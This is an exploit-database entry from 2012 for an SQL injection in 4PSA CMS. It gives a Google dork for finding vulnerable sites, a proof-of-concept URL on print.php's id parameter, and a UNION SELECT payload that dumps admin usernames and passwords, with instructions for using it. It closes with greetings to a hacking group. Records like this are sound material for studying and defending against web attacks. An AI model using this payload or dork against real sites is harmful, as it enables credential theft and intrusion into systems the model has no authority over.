4PSA CMS - SQL Injection

Author: BHG Security Center
type: webapps
platform: php
port: 
date_added: 2012-02-19 
date_updated: 2012-02-19 
verified: 0 
codes: OSVDB-80802 
tags: 
aliases:  
screenshot_url:  
application_url: 

#################################################################################
# Exploit Title: 4PSA CMS SQL Injection Vulnerabilities
# Google Dork: "Communications solution from 4PSA."
# Date: 2012/02/19
# Category : [Web Application]
# Author: #BHG Security Center
# Discovered by : Nitrojen90
# WebSite:WwW.Black-hg.Org
# Software Link: http://www.4psa.com/
# Version: Last Version
# Security Risk::High
# Tested on: GNU/Linux - Windows
#################################################################################
# p0c :
#
# http://target.com/print.php?id=[SQL]
#
# write the code in front of the print.php?id= and enter for show all admin
#
# user & Pass.
#
# Eval Code : NULL UNION+SelEct+group_concat(uname,0x3a,pwd),2+FROM user--
#
#################################################################################

#################################################################################
# Special Thanks To : Net.Edit0r - 3H34N - A.Cr0x - 4M!N - ArYaIeIrAN -
G3n3rall
# Mr.XHat - Bl4ck.Viper - Dj.TiniVini
#################################################################################
# GreetZ : All Active Member in #BHG Security Center & md.r00t - hellboy -
fr0nk
#################################################################################